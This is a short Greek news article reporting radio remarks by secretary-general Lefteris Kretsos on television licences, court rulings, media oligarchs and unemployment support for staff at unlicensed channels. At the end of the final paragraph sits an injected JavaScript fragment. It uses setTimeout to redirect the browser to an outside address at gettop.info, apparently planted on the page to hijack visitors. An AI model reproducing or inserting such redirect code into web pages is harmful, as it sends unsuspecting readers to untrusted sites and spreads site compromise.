Κρέτσος: Οι αποφάσεις της Δικαιοσύνης είναι δεσμευτικές, αλλά όχι και σεβαστές

0
4

 

Μιλώντας στο ραδιόφωνο της Θεσσαλονίκης NORTH 98.0 και αναφερομενος στις τηλεοπτικές άδειες ο γενικός γραμματέας Eνημέρωσης Λευτέρης Κρέτσος τόνισε: «Οι αποφάσεις της Δικαιοσύνης είναι δεσμευτικές, αλλά όχι και σεβαστές».

Επίσης, συμπλήρωσε πως «ο καθένας έχει δικαίωμα να κρίνει τις αποφάσεις όποιες και αν είναι» και επανέλαβε πως αν ο νόμος κριθεί αντισυνταγματικός, τότε υποχρέωση της πολιτείας είναι να επιστρέψει στο σύνολό του τα χρήματα στους δικαιούχους.

«Θα λείψουν από άλλες δράσεις για την αντιμετώπιση των ανθρώπων που κινούνται στα όρια της φτώχειας, αλλά η πολιτεία θα κάνει ό,τι νόμιμο προβλέπεται», υπογράμμισε και σημείωσε πως μια κλειστή ομάδα ολιγαρχών είχε στα χέρια της όλα τα προηγούμενα χρόνια ΜΜΕ, αφού ΝΔ και ΠΑΣΟΚ που δεν ρύθμισαν το τηλεοπτικό τοπίο χρωστούσαν στη διαπλοκή και δεν προχωρούσαν στον διαγωνισμό.

Ο κ. Κρέτσος ανέφερε επίσης ότι μόνο ο τηλεοπτικός σταθμός Alpha παρουσίασε το 2015 ισολογισμό, ενώ σε ό,τι αφορά τους εργαζομένους ΜΜΕ που μπορεί να χάσουν τη δουλειά τους και εργάζονται σε μη αδειοδοτημένα κανάλια, τόνισε ότι προβλέπεται στην περίπτωση αυτή ειδική στήριξη, μέσα από επιδόματα ανεργίας, με βάση τη συλλογική σύμβαση εργασίας που υπάρχει από το 2009. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here